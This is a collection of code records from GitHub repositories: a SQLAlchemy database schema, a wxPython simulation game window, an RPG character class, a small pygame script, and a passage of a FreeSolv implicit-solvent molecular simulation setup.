################################################################################## DB Management Methods\n #############################################################################################\n\n def __create_engine(self, paramString: str, echo: bool ) -> None: #\"sqlite+pysqlite:///:memory:\"\n \"\"\"Creates an engine object and tethers it to this interface class as an attribute\n\n Parameters:\n paramString: str - A SQLAlchemy string that defines the location the engine should point to: (e.g. \"sqlite+pysqlite:///:memory:\")\n echo: bool - Whether or not the engine should echo to stdout\n \"\"\"\n self._engine = sqlalchemy_create_engine(paramString, echo=echo)\n\n \n def __get_engine(self) -> Engine:\n \"\"\"Fetches the engine attribute. Requires the engine attribute to be created.\n See: DBManager.create_engine()\n \"\"\"\n\n if not hasattr(self, '_engine') or self._engine == None:\n raise Exception(\"An engine was requested from DBManager, but no engine has been created. See DBManager.create_engine()\")\n else:\n return self._engine\n\n def __create_schema(self) -> None:\n \"\"\"Builds the db schema in the metadata.\n \"\"\"\n\n self._metadata = MetaData()\n \n #this table stores the actual data values as retrieved or received \n self.inputs = Table(\n \"inputs\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n\n Column(\"generatedTime\", DateTime, nullable=True),\n Column(\"acquiredTime\", DateTime, nullable=False),\n Column(\"verifiedTime\", DateTime, nullable=False), \n\n Column(\"dataValue\", String(10), nullable=False), \n\n Column(\"isActual\", Boolean, nullable=False),\n\n Column(\"dataUnit\", String(10), ForeignKey(\"ref_dataUnit.code\"), nullable=False), \n \n Column(\"dataSource\", String(10), ForeignKey(\"ref_dataSource.code\"), nullable=False),\n Column(\"dataLocation\", String(25), ForeignKey(\"ref_dataLocation.code\"), nullable=False), \n Column(\"dataSeries\", String(10), ForeignKey(\"ref_dataSeries.code\"), nullable=False), \n Column(\"dataDatum\", String(10), ForeignKey(\"ref_dataDatum.code\"), nullable=False),\n \n Column(\"latitude\", String(16), nullable=True),\n Column(\"longitude\", String(16), nullable=True),\n\n UniqueConstraint(\"isActual\", \"generatedTime\", \"verifiedTime\", \"dataUnit\", \"dataSource\", \"dataLocation\", \"dataSeries\", \"dataDatum\", \"latitude\", \"longitude\"),\n )\n\n \n self.outputs = Table(\n \"outputs\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"timeGenerated\", DateTime, nullable=False),\n\n Column(\"leadTime\", Interval, nullable=False),\n\n Column(\"modelName\", String(25), nullable=False), \n Column(\"modelVersion\", String(10), nullable=False),\n Column(\"dataValue\", String(20), nullable=False), \n Column(\"dataUnit\", String(10), ForeignKey(\"ref_dataUnit.code\"), nullable=False), \n Column(\"dataLocation\", String(25), ForeignKey(\"ref_dataLocation.code\"), nullable=False), \n Column(\"dataSeries\", String(10), ForeignKey(\"ref_dataSeries.code\"), nullable=False), \n Column(\"dataDatum\", String(10), ForeignKey(\"ref_dataDatum.code\"), nullable=True),\n\n UniqueConstraint(\"timeGenerated\", \"leadTime\", \"modelName\", \"modelVersion\", \"dataLocation\", \"dataSeries\", \"dataDatum\"),\n )\n\n #This table maps CBI location codes to location codes used by data sources\n self.dataLocation_dataSource_mapping = Table(\n \"dataLocation_dataSource_mapping\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, 
primary_key=True),\n \n Column(\"dataLocationCode\", String(25), ForeignKey(\"ref_dataLocation.code\"),nullable=False), \n Column(\"dataSourceCode\", String(10), ForeignKey(\"ref_dataSource.code\"), nullable=False), \n Column(\"dataSourceLocationCode\", String(255), nullable=False), \n Column(\"priorityOrder\", Integer, nullable=False), \n\n UniqueConstraint(\"dataLocationCode\", \"dataSourceCode\", \"dataSourceLocationCode\", \"priorityOrder\"),\n )\n\n\n #The rest of these tables are reference tables for values stored in the tables above. They all contain\n # ID - Automated id\n # code - that mapped code\n # display name - a non compressed pretty name\n # notes - more information about that item\n self.ref_dataLocation = Table(\n \"ref_dataLocation\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"code\", String(25), nullable=False),\n Column(\"displayName\", String(30), nullable=False),\n Column(\"notes\", String(250), nullable=True),\n Column(\"latitude\", String(16), nullable=False),\n Column(\"longitude\", String(16), nullable=False),\n\n UniqueConstraint(\"code\", \"displayName\"),\n )\n\n self.ref_dataSource = Table(\n \"ref_dataSource\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"code\", String(10), nullable=False),\n Column(\"displayName\", String(30), nullable=False),\n Column(\"notes\", String(250), nullable=True),\n\n UniqueConstraint(\"code\", \"displayName\"),\n )\n\n self.ref_dataSeries = Table(\n \"ref_dataSeries\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"code\", String(10), nullable=False),\n Column(\"displayName\", String(30), nullable=False),\n Column(\"notes\", String(250), nullable=True),\n\n UniqueConstraint(\"code\", \"displayName\"),\n )\n\n self.ref_dataUnit = Table(\n \"ref_dataUnit\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"code\", String(10), nullable=False),\n Column(\"displayName\", String(30), nullable=False),\n Column(\"notes\", String(250), nullable=True),\n\n UniqueConstraint(\"code\", \"displayName\"),\n )\n\n self.ref_dataDatum = Table(\n \"ref_dataDatum\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"code\", String(10), nullable=False),\n Column(\"displayName\", String(30), nullable=False),\n Column(\"notes\", String(250), nullable=True),\n\n UniqueConstraint(\"code\", \"displayName\"),\n )\n\n #############################################################################################\n ################################################################################## DB Interaction private methods\n #############################################################################################\n\n def __dbSelection(self, stmt: Select) -> CursorResult:\n \"\"\"Runs a selection statement \n Parameters:\n stmt: SQLAlchemy Select - The statement to run\n Returns:\n SQLAlchemy CursorResult\n \"\"\"\n\n with self.__get_engine().connect() as conn:\n result = conn.execute(stmt)\n\n return result\n\n def __splice_input(self, results: list[tuple]) -> list[Input]:\n \"\"\"An Input is a data value of some environment variable that can be linked to a date time.\n :param list[tupleish] -a list of selections from the table formatted in tupleish\n \"\"\"\n valueIndex = 4\n unitIndex = 6\n generatedTimeIndex = 1\n verifiedTimeIndex = 3\n latitudeIndex = 11\n longitudeIndex = 12\n\n dataPoints 
= []\n for row in results:\n dataPoints.append(Input(\n row[valueIndex],\n row[unitIndex],\n row[verifiedTimeIndex],\n row[generatedTimeIndex],\n row[longitudeIndex],\n row[latitudeIndex]\n ))\n\n return dataPoints\n\n def __splice_output(self, results: list[tuple]) -> list[Output]:\n \"\"\"Splices up a list of DB results, pulling out only the data that changes per point,\n and places them in a Prediction object.\n param: list[tupleish] - a list of selections from the table formatted in tupleish\n \"\"\"\n valueIndex = 5\n unitIndex = 6\n timeGeneratedIndex = 1\n leadTimeIndex = 2\n \n dataPoints = []\n for row in results:\n dataPoints.append(Output(\n row[valueIndex],\n row[unitIndex],\n row[timeGeneratedIndex],\n row[leadTimeIndex]\n ))\n\n return dataPoints\n\n def insert_lat_lon_test(self, code: str, displayName: str, notes: str, latitude: str, longitude: str):\n \"\"\"This method inserts lat and lon information\n \"\"\"\n #Construct DB row to insert\n insertionValueRow = {\"code\": code, \"displayName\": displayName, \"notes\": notes, \"latitude\": latitude, \"longitude\": longitude}\n \n with self.__get_engine().connect() as conn:\n conn.execute(insert(self.ref_dataLocation)\n .values(insertionValueRow))\n conn.commit()\n\n def insert_external_location_code(self, dataLocationCode: str, dataSourceCode: str, dataSourceLocationCode: str, priorityOrder: int):\n \"\"\"This method inserts external location code information\n \"\"\"\n #Construct DB row to insert\n insertionValueRow = {\"dataLocationCode\": dataLocationCode, \"dataSourceCode\": dataSourceCode, \"dataSourceLocationCode\": dataSourceLocationCode, \"priorityOrder\": priorityOrder}\n \n with self.__get_engine().connect() as conn:\n conn.execute(insert(self.dataLocation_dataSource_mapping)\n .values(insertionValueRow))\n conn.commit()","repo_name":"conrad-blucher-institute/semaphore","sub_path":"src/SeriesStorage/SeriesStorage/SQLAlchemyORM.py","file_name":"SQLAlchemyORM.py","file_ext":"py","file_size_in_byte":22520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6586417681","text":"'''用于创建一个窗口界面'''\nimport random\nimport wx\nimport _thread\nfrom threading import Timer\n\n\nimport var\nimport MyClass\n\nclass MyLabel(wx.StaticText):\n '''标签框'''\n def __init__(self,label='000'):\n self.SetLabel(label)\n self.SetBackgroundColour('#FFFFFF')\n \n\n\n\nclass Mywin(wx.Frame):\n '''创建一个窗口类.\\n'''\n def __init__(self):\n ''' 构造函数\\n'''\n super(Mywin, self).__init__(None, title='SIM', size=(1000, 800))\n ################################################################\n self.scroller = wx.ScrolledWindow(self, -1)\n self.scroller.SetBackgroundColour('#666666')\n self.scroller.SetScrollbars( 1, 1, 1000, 1000)\n self.panel = wx.Panel(self.scroller)\n self.grid0 = wx.BoxSizer(wx.VERTICAL) # 最基本的布局\n self.表=[]\n self.tick=0\n self.isRun = True\n ##############################################################\n self. 
创建单位列表()\n ##################################################################\n # 窗口添加内容\n self.添加菜单栏()\n ##############################################################\n self.grid_抬头 = wx.BoxSizer(wx.HORIZONTAL)\n self.grid0.Add(self.grid_抬头, 1, flag = wx.ALL|wx.EXPAND,border = 5)\n\n self.txt1 = self.__创建label('Tick:',宽度=150,字体=25)\n self.txt1.SetWindowStyleFlag(style=wx.ALIGN_LEFT)\n self.grid_抬头.Add(self.txt1, 3, flag=wx.EXPAND)\n self.grid_抬头.AddStretchSpacer(1)\n self.bt1 = wx.Button(self.panel, label=\"刷新\")\n self.grid_抬头.Add(self.bt1,5, flag=wx.EXPAND)\n self.bt1.Bind(wx.EVT_BUTTON, self.刷新)\n self.grid_抬头.AddStretchSpacer(1) \n self.bt2 = wx.Button(self.panel, label=\"刷新2\")\n self.grid_抬头.Add(self.bt2,5, flag=wx.EXPAND)\n self.bt2.Bind(wx.EVT_BUTTON, self.刷新2)\n\n ###############################################################\n self.grid_信息表 = wx.GridBagSizer(2, 2) # 参数是子控件之间上下和左右距离\n self.grid0.Add(self.grid_信息表, 10, flag = wx.ALL|wx.EXPAND,border = 5)\n self.添加表头()\n self.添加信息表(self.grid_信息表,self.panel )\n #self.grid0.AddStretchSpacer(1) \n ###########################################################\n\n ############################################\n self.添加资源栏(self.grid0)\n ###########################################################\n self.panel.SetSizerAndFit(self.grid0)\n self.Center()\n self.Show()\n\n def 创建单位列表(self):\n for i in var.产品列表:\n var.单位列表.append(MyClass.factory(self.panel,i))\n\n def 添加菜单栏(self):\n fileMenu = wx.Menu('菜单标题') #顶级菜单\n newitem = wx.MenuItem(fileMenu,wx.ID_NEW, text = \"New\",helpString='= wx.ITEM_NORMAL')\n #newitem.SetBitmap(wx.Bitmap(\"捕捉.png\"))\n fileMenu.Append(newitem)\n #fileMenu.AppendItem(quit)\n\n self.Menu2 = wx.Menu('菜单标题')\n self.Menu3 = wx.Menu()\n menubar = wx.MenuBar()\n menubar.Append(fileMenu, '&File')\n menubar.Append(self.Menu2, '&File2')\n menubar.Append(self.Menu3, 'menu3')\n\n self.SetMenuBar(menubar) \n self.Bind(wx.EVT_MENU, self.菜单栏事件) \n self.t = Timer(1.0, self.display)\n def 添加表头(self):\n for i in var.信息表[0] :\n temp =self.__创建label(i,150)\n self.grid_信息表.Add(temp, pos = (var.信息表[0].index(i),0), flag=wx.EXPAND )\n\n def 添加信息表(self, grid, panel):\n # 添加表格\n for i in var.单位列表:\n self.表.append([])\n temp= None\n temp = i.get信息()\n for j in range(len(temp)) :\n _l = self.__创建label(str(temp[j]),100 )\n self.表[-1].append(_l )\n _pos=( j, var.单位列表.index(i)+1)\n grid.Add(_l, pos = _pos, flag=wx.EXPAND )\n\n #grid.Add(_l, pos = _pos, flag=wx.EXPAND )\n def 刷新(self,e):\n # print('--'*20)\n print('刷新1','--'*20)\n for i in var.单位列表:\n i.refresh()\n for i in var.单位列表:\n temp= None\n temp = i.get信息()\n for j in range(len(temp)) :\n self.表[var.单位列表.index(i)][j].SetLabel(str(temp[j]))\n self.资金总和()\n\n def 刷新2(self,e):\n #print('--'*20)\n # print('--'*20)\n for i in var.单位列表:\n i.sub结算()\n for i in var.单位列表:\n temp= None\n temp = i.get信息()\n for j in range(len(temp)) :\n self.表[var.单位列表.index(i)][j].SetLabel(str(temp[j]))\n self.资金总和()\n \n def 菜单栏事件(self,event):\n id = event.GetId()\n if id == wx.ID_NEW: \n self.Menu2.SetTitle(str(random.random())) #SetLabel(random.random())\n if id == 1099: \n self.MenuItem1.SetTitle(str(random.random())) \n #s=event.GetValue()\n print(event.GetEventObject().Title)\n\n def 添加资源栏(self, grid):\n # 添加表格\n for i in var.单位列表:\n grid.Add( i.grid, flag=wx.ALL|wx.EXPAND)\n i.addCtrls(self.panel)\n self.grid0.AddStretchSpacer(1)\n\n def __创建label(self,txt='txt',宽度=50,字体=20,颜色='#FFFFFF'):\n temp = wx.StaticText(self.panel, label=txt,size=(宽度,-1),style=wx.ALIGN_CENTRE)\n temp.SetBackgroundColour(颜色)\n font = 
wx.Font(字体,wx.FONTFAMILY_DEFAULT,wx.FONTSTYLE_NORMAL,wx.FONTWEIGHT_NORMAL) \n temp.SetFont(font) \n return temp\n\n def display(self, e=0):\n self.tick +=1\n self.txt1.SetLabel('Tick:'+'{:>3d}'.format(self.tick))\n print('Tick:',self.tick)\n self.刷新('')\n '''try:\n #self.刷新2('')\n self.刷新('')\n except:\n print(\"Error: failed to start thread\")'''\n if self.isRun :\n self.t = Timer(2.0, self.display)\n self.t.start()\n def 预算(self):\n for i in var.单位列表:\n i.sub预算()\n print('buy',var.buy)\n print('out',var.out)\n\n def 资金总和(self):\n rv = 0\n temp = ''\n for i in var.单位列表:\n rv += i.get净资产()\n if rv < 10000 :\n temp = '{:>4d}'.format(rv)\n elif rv < 10**6: # ** is exponentiation; '^' would be bitwise XOR\n rv1 = rv // 10000\n rv2 = rv % 10000\n temp = '{:>4d}'.format(rv1)+'_'+'{:0>4d}'.format(rv2)\n else:\n temp = str(rv)\n try :\n self.SetTitle(temp)\n except:\n print('SetTitle')\n\ndef 启动窗口():\n print('Program starting ...')\n app = wx.App()\n #app.locale = wx.Locale(wx.LANGUAGE_CHINESE_SIMPLIFIED)\n win = Mywin()\n win.t.start()\n win.bt1.Enable(False)\n app.MainLoop()\n\n\n启动窗口()\n\n\n\n\n\n\n","repo_name":"bmzk/sim-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"14233619684","text":"from .name_generator import NameGenerator\nfrom . import abilities\nfrom . import animalsubtypes\nfrom . import skills\nfrom . import animaltypes\nimport math\n\n\nclass Character:\n abilities = abilities.CharacterAbilities()\n\n def __init__(self, name=None, animaltype=None, animalsubtype=None, level=1, build_points=10, skills=None, status=None, temp_status=None, erfahrung=0, stealth=False, savers=False):\n # Default list arguments to None instead of [], so instances do not share one mutable default\n self.name = name\n self.animaltype = animaltype\n self.animalsubtype = animalsubtype\n self.level = level\n self.build_points = build_points\n self.skills = skills if skills is not None else []\n self.update_Skills(self.skills)\n self.status = status if status is not None else []\n self.temp_status = temp_status if temp_status is not None else []\n self.erfahrung = erfahrung\n self.stealth = stealth\n self.savers = savers\n\n def exp_needed_for_Level_Up(self):\n constant = 40\n exp_needed = int(round((constant * self.level) * math.sqrt(constant)))\n return exp_needed\n\n def level_up_check(self):\n if self.get_experience() >= self.exp_needed_for_Level_Up():\n self.LevelUp()\n\n def get_experience(self):\n return self.erfahrung\n\n def gain_experience(self, amount):\n self.erfahrung += amount\n self.level_up_check()\n\n def get_status_max(self, input_string):\n # Health\n if input_string == 'health':\n return self.status[0]\n # Endurance\n elif input_string == 'endu':\n return self.status[1]\n # Magic\n elif input_string == \"magic\":\n return self.status[2]\n\n def set_stealth_mode(self, Bool):\n self.stealth = Bool\n\n def get_stealth_mode(self):\n return self.stealth\n\n def set_savers_mode(self, Bool):\n self.savers = Bool\n\n def get_savers_mode(self):\n return self.savers\n\n def get_status_temp(self, input_string):\n if input_string == 'health':\n return self.temp_status[0]\n elif input_string == 'endu':\n return self.temp_status[1]\n elif input_string == \"magic\":\n return self.temp_status[2]\n\n def change_status_temp(self, input_string, Vorzeichen):\n if input_string == 'health':\n if Vorzeichen == '+':\n if self.temp_status[0] < self.status[0]:\n self.temp_status[0] += 1\n if Vorzeichen == '-':\n if self.temp_status[0] > 0:\n self.temp_status[0] -= 1\n elif input_string == 'endu':\n if Vorzeichen == '+':\n if self.temp_status[1] < self.status[1]:\n self.temp_status[1] += 1\n if Vorzeichen == '-':\n if 
self.temp_status[1] > 0:\n self.temp_status[1] -= 1\n elif input_string == \"magic\":\n if Vorzeichen == '+':\n if self.temp_status[2] < self.status[2]:\n self.temp_status[2] += 1\n if Vorzeichen == '-':\n if self.temp_status[2] > 0:\n self.temp_status[2] -= 1\n\n def set_status_initial(self):\n endurancemodifier=(self.get_resi()+self.get_dext())\n magicmodifier=(self.get_int())\n if isinstance(self.animaltype, animaltypes.clsBaer):\n self.status = [20, 40+endurancemodifier, 5+magicmodifier]\n if self.has_Skill(skills.EnduranceCharacterSkill):\n self.status[1] *= 2\n elif isinstance(self.animaltype, animaltypes.clsRobbe):\n self.status = [10, 35+endurancemodifier, 15+magicmodifier]\n if self.has_Skill(skills.EnduranceCharacterSkill):\n self.status[1] *= 20\n self.temp_status = self.status[:]\n\n def get_str(self):\n return self.abilities.__getattribute__('strength').value\n\n def get_dext(self):\n return self.abilities.__getattribute__('dexterity').value\n\n def get_resi(self):\n return self.abilities.__getattribute__('resistance').value\n\n def get_int(self):\n return self.abilities.__getattribute__('intelligence').value\n\n def get_Name(self):\n return self.name\n\n def set_Name(self, name):\n self.name = str(name)\n\n def get_Skills(self):\n return self.skills\n\n def set_Skill(self, input_skill):\n self.skills.append(input_skill)\n\n def get_Level(self):\n level = str(self.level)\n return level\n\n def set_Type(self, type):\n self.animaltype = type()\n\n def get_Type(self):\n return self.animaltype\n\n def set_Subtype(self, animalsubtype):\n self.animalsubtype = animalsubtype()\n self.update_applicable_Skills()\n self.update_Skills(self.skills)\n\n def get_Subtype(self):\n return self.animalsubtype\n\n def get_Build_Points(self):\n return self.build_points\n\n def gain_Build_Points(self, points):\n self.build_points += points\n\n def lower_Build_Points(self, points):\n self.build_points -= points\n\n def spend_Build_Points(self, input_ability):\n for ability in abilities.ALL:\n if str(ability.id) == input_ability:\n getattr(self.abilities, ability.id).value += 1\n self.update_applicable_Skills()\n self.update_Skills(self.skills)\n break\n\n def lose_Build_Points(self, input_ability):\n for ability in abilities.ALL:\n if str(ability.id) == input_ability:\n getattr(self.abilities, ability.id).value -= 1\n self.update_applicable_Skills()\n self.update_Skills(self.skills)\n break\n\n def Build_Point_Value(self, input_ability):\n for ability in abilities.ALL:\n if str(ability.id) == input_ability:\n return getattr(self.abilities, ability.id).value\n\n def LevelUp(self):\n num_redo=self.get_status_max(\"health\")-self.get_status_temp(\"health\")\n for i in range(num_redo):\n self.change_status_temp(\"health\", \"+\")\n num_redo = self.get_status_max(\"endu\") - self.get_status_temp(\"endu\")\n for i in range(num_redo):\n self.change_status_temp(\"endu\", \"+\")\n for i in range(num_redo):\n self.change_status_temp(\"magic\", \"+\")\n\n self.build_points+=1\n if self.level>6:\n self.build_points+=1\n self.level = self.level+1\n\n def randomize_Name(self):\n name = NameGenerator.generate_name(2, 5)\n self.set_Name(name)\n\n def update_applicable_Skills(self):\n self.skills = []\n for skill in skills.ALL:\n continues = True\n for subtype in skill.applicable_subtype:\n if (isinstance(self.animalsubtype, subtype)):\n continues = False\n break\n if continues:\n continue\n continues = False\n\n for required_ability, min_value in skill.required_abilities.items():\n if getattr(self.abilities, 
required_ability.id).value < min_value:\n continues = True\n break\n if continues:\n continue\n self.skills.append(skill)\n\n def update_Skills(self, Liste):\n self.skills = Liste[:]\n\n def has_Skill(self, input_skill):\n for skill in self.skills:\n if skill == input_skill:\n return True\n return False\n\n# für den Charakterbogen\n def __str__(self):\n content = [\n '## Charakter Bogen',\n '',\n ' - Name: ' + self.name,\n ' - Tierart: ' + str(self.animaltype),\n ' - Farbe: ' + str(self.animalsubtype),\n '',\n '## Statuswerte',\n ''\n ]\n for ability in abilities.ALL:\n content.append(' - ' + ability.name + ': ' +\n str(getattr(self.abilities, ability.id).value))\n content.extend([\n '',\n '## Fähigkeiten',\n ''\n ])\n if not self.skills:\n content.append('Keine Fähigkeiten verfügbar.')\n else:\n for skill in self.skills:\n content.append(' - ' + skill.name)\n return '\\n'.join(content)\n","repo_name":"Vulnona/Little-Seal-and-Bear","sub_path":"character/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25346302971","text":"import pygame\n\nWIDTH, HEIGHT = 900, 500\nFPS = 60\n\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('Game')\n\n\n# MAIN\ndef main():\n clock = pygame.time.Clock()\n run = True\n x = 10\n\n while run:\n clock.tick(FPS)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n rects = pygame.Rect(0,0,x,HEIGHT)\n x += 10\n\n # Draw\n def draw_window():\n WIN.fill('light blue')\n pygame.draw.rect(WIN, 'red', rects)\n \n pygame.display.update()\n\n draw_window()\n \n\n\nif __name__ == '__main__':\n main()\n\npygame.quit()","repo_name":"SWESH1K/Space-Mania","sub_path":"timepass.py","file_name":"timepass.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40659579747","text":"from collections import defaultdict\nimport numpy as np\nfrom simtk import unit\n\nfrom simtk import unit\n\ntemperature = 298.15 * unit.kelvin # conditions from FreeSolv\npressure = 1.01325 * unit.bar # conditions from FreeSolv\nfrom openmmtools.constants import kB\n\nkT = kB * temperature\nfrom openeye import oechem\n\n# 0. Load the systems and coordinates precomputed for FreeSolv\nprint('loading pickles')\nfrom pickle import load\nwith open('pickles/some_generated_systems.pkl', 'rb') as f:\n generated_systems = load(f) # list of (mol, topology, system, positions) tuples\nprint(len(generated_systems))\n\n# TODO: must regenerate these, since the default GBSA parameters I used were very wrong probably...\nwith open('pickles/some_generated_samples.pkl', 'rb') as f:\n generated_samples = load(f) # list of { \"xyz_vacuum\": xyz_vacuum, \"xyz_implicit\": xyz_implicit } dicts\n\ndef load_freesolv(path=\"../../FreeSolv-0.51/database.txt\"):\n \"\"\"Loads the freesolv database as a list of lists of strings\"\"\"\n with open(path, 'r') as f:\n freesolv = f.read()\n\n legend = freesolv.split('\\n')[2].split('; ')\n db = []\n for entry in freesolv.split('\\n')[3:-1]:\n db.append(entry.split('; '))\n return legend, db\n\nlegend, db = load_freesolv()\nexpt_measurements = [(float(entry[3]), float(entry[4])) for entry in db]\n\n# 1. 
Construct models, one for each forcefield\nfrom openforcefield.typing.engines.smirnoff import ForceField\n\n\ndef get_parameter_ids(ff, mol):\n \"\"\"Get a list with the SMIRNOFF parameter id of each atom in the input OEMol object\"\"\"\n\n # pass in a length-1 list, receive a length-1 list, assign its item to \"all_labels\"\n all_labels = ff.labelMolecules([mol])[0]\n\n # \"all_labels\" is a dict, with keys:\n # ['HarmonicBondGenerator', 'HarmonicAngleGenerator', 'PeriodicTorsionGenerator', 'NonbondedGenerator']\n nonbonded_labels = all_labels['NonbondedGenerator']\n\n # \"nonbonded_labels\" is a list of 3-tuples,\n # where the 2nd element in each tuple is a string like 'n3' or 'n15' parameter id assigned\n parameter_ids = [label[1] for label in nonbonded_labels]\n return parameter_ids\n\ndef parameter_id_to_index(parameter_id):\n \"\"\"Converts a SMIRNOFF parameter id string (like 'n3' or 'n15') to an 0-start integer index\"\"\"\n\n assert(parameter_id[0] == 'n') # make sure this is a nonbonded parameter...\n\n return int(parameter_id[1:]) - 1\n\nfrom glob import glob\nforcefield_paths = glob('forcefields/*.ffxml')\n# make sure we only keep the modified forcefields\nforcefield_paths = [path for path in forcefield_paths if '_' in path]\n\nactive_gbsa_param_sets = defaultdict(set)\n\nprint('applying each forcefield to each molecule')\nfrom tqdm import tqdm\nfor forcefield in tqdm(forcefield_paths[:5]):\n\n truncation = int(forcefield.split('.')[0].split('_')[-1])\n\n ff = ForceField(forcefield)\n\n for i in range(len(generated_systems)):\n mol = generated_systems[i][0]\n active_gbsa_param_sets[truncation].update(get_parameter_ids(ff, mol))\n\nfor key in sorted(active_gbsa_param_sets.keys()):\n print(key, len(active_gbsa_param_sets[key]))\n\n\n# let's select a single model, the one with just two atom types, so we can visualize them\n\nn_types = 10\ngbsa_forcefield = ForceField([path for path in forcefield_paths if '_{}.ffxml'.format(n_types) in path][0])\n\ndef generate_initial_params(n_types):\n return np.hstack([[1.5]*n_types, [0.5]*n_types])\ninitial_params = generate_initial_params(n_types)\n\n# note, gbsa_forcefield will only be used for the gbsa radius definitions\n\nfrom openforcefield.typing.engines.smirnoff.gbsaforces import OBC2\n\nfrom multiprocessing import Pool\nn_subprocesses = 4\n\nkT = kB * temperature\n\nfrom openmmtools.integrators import BAOABIntegrator\nfrom simtk import unit\nfrom simtk import openmm as mm\nfrom simtk.openmm import app\nimport numpy as np\nfrom tqdm import tqdm\n\n\ndef generate_sim(topology, system, platform_name=\"Reference\"):\n if platform_name == \"Reference\":\n platform = mm.Platform.getPlatformByName(\"Reference\")\n platform_properties = None\n elif platform_name == \"CUDA\":\n platform = mm.Platform.getPlatformByName(\"CUDA\")\n platform_properties = {\"CudaPrecision\": \"mixed\"}\n\n baoab = BAOABIntegrator(collision_rate=1 / unit.picosecond, timestep=2 * unit.femtosecond, temperature=temperature)\n sim = app.Simulation(topology, system, baoab, platform=platform, platformProperties=platform_properties)\n return sim\n\ndef generate_implicit_system_from_vacuum_system(system, topology):\n from copy import deepcopy\n implicit_system = deepcopy(system)\n\n #attempt 1: find the OBC force, and put it on the implicit system\n #dummy_forcefield = app.ForceField('amber99_obc.xml')\n #dummy_system = dummy_forcefield.createSystem(topology)\n # TODO: Document why this didn't work\n\n #attempt 2: create implicit solvent system directly\n #dummy_system = 
topology.createSystem(implicitSolvent=OBC2)\n # TODO: Document why this didn't work\n\n #attempt 3: add each particle manually\n atom_symbols = [a.element.symbol for a in topology.atoms()]\n\n # (radius, scale)\n default = (1.5, 0.5)\n initial_params = {\n 'H': (1.2, 1.425952),\n 'C': (1.7, 1.058554),\n 'N': (1.55, 0.733599),\n 'O': (1.5, 1.061039),\n 'F': (1.5, 0.500000),\n 'Si': (2.1, 0.500000),\n 'P': (1.85, 0.500000),\n 'S': (1.8 - 0.703469, 0.867814),\n 'Cl': (1.7, 0.500000),\n 'Br': (1.5, 0.500000),\n 'I': (1.5, 0.500000),\n }\n\n nb_force = [f for f in system.getForces() if 'Nonbonded' in f.__class__.__name__][0]\n\n obc2 = OBC2()\n for i in range(topology.getNumAtoms()):\n # get (radius, scale) from defaults\n if atom_symbols[i] in initial_params:\n radius, scale = initial_params[atom_symbols[i]]\n else:\n radius, scale = default\n\n # get charge from whatever was assigned in nonbonded force\n charge = nb_force.getParticleParameters(i)[0]\n\n # (charge (elementary charge), radius (nm), scale (nm))\n obc2.addParticle((charge, radius, scale))\n implicit_system.addForce(obc2)\n\n print([f.__class__.__name__ for f in implicit_system.getForces()])\n\n return implicit_system\n\n\nclass Molecule():\n \"\"\"\"\"\"\n def __init__(self, mol, top, sys, pos, xyz_vacuum=[], xyz_implicit=[], expt=0, expt_stdev=1, gbsa_forcefield=gbsa_forcefield):\n \"\"\"\n\n :param mol: oechem.oemol\n :param top: openmm.topology\n :param sys: openmm.system\n :param pos: (n_atoms,3) coordinate array\n :param xyz_vacuum: (n_samples, n_atoms, 3) coordinates array\n :param xyz_implicit: (n_samples, n_atoms, 3) coordinates array\n :param expt: experimental solvation free energy (kT)\n :param expt_stdev: stdev of experimental solvation free energy (kT)\n :param gbsa_forcefield: forcefield to use for GBSA \"types\"\n \"\"\"\n\n self.mol, self.top, self.sys, self.pos = mol, top, sys, pos\n self.n_atoms = self.top.getNumAtoms()\n\n self.vacuum_sim, self.implicit_sim = self.generate_sims(top, sys)\n\n if len(xyz_vacuum) == 0 or len(xyz_implicit) == 0:\n print('generating some samples')\n xyz_vacuum, xyz_implicit = self.get_samples()\n\n\n self.all_snapshots = list(xyz_implicit) + list(xyz_vacuum)\n self.mbar = self.mbar_from_endpoints(xyz_implicit, xyz_vacuum)\n\n self.expt = expt\n self.expt_stdev = expt_stdev\n\n self.gbsa_forcefield = gbsa_forcefield\n self.type_list = [parameter_id_to_index(id) for id in get_parameter_ids(self.gbsa_forcefield, self.mol)]\n\n def generate_sims(self, topology, system):\n implicit_system = generate_implicit_system_from_vacuum_system(system, topology)\n # Generate reference-platform simulations we'll use for energy calculations later\n vacuum_sim = generate_sim(topology, system, \"Reference\")\n implicit_sim = generate_sim(topology, implicit_system, \"Reference\")\n return vacuum_sim, implicit_sim\n\n def simulate(self, sim, init_pos, n_snapshots=5, thinning=1000):\n \"\"\"Collect samples for a given topology / system\"\"\"\n\n sim.context.setPositions(init_pos)\n sim.minimizeEnergy()\n sim.step(thinning)\n\n snapshots = []\n for _ in tqdm(range(n_snapshots)):\n sim.step(thinning)\n snapshots.append(sim.context.getState(getPositions=True).getPositions(asNumpy=True))\n\n xyz = np.array([coords.value_in_unit(unit.nanometers) for coords in snapshots])\n return xyz\n\n def get_samples(self):\n xyz_vacuum = self.simulate(self.vacuum_sim, self.pos)\n xyz_implicit = self.simulate(self.implicit_sim, self.pos)\n\n return xyz_vacuum, xyz_implicit\n\n def 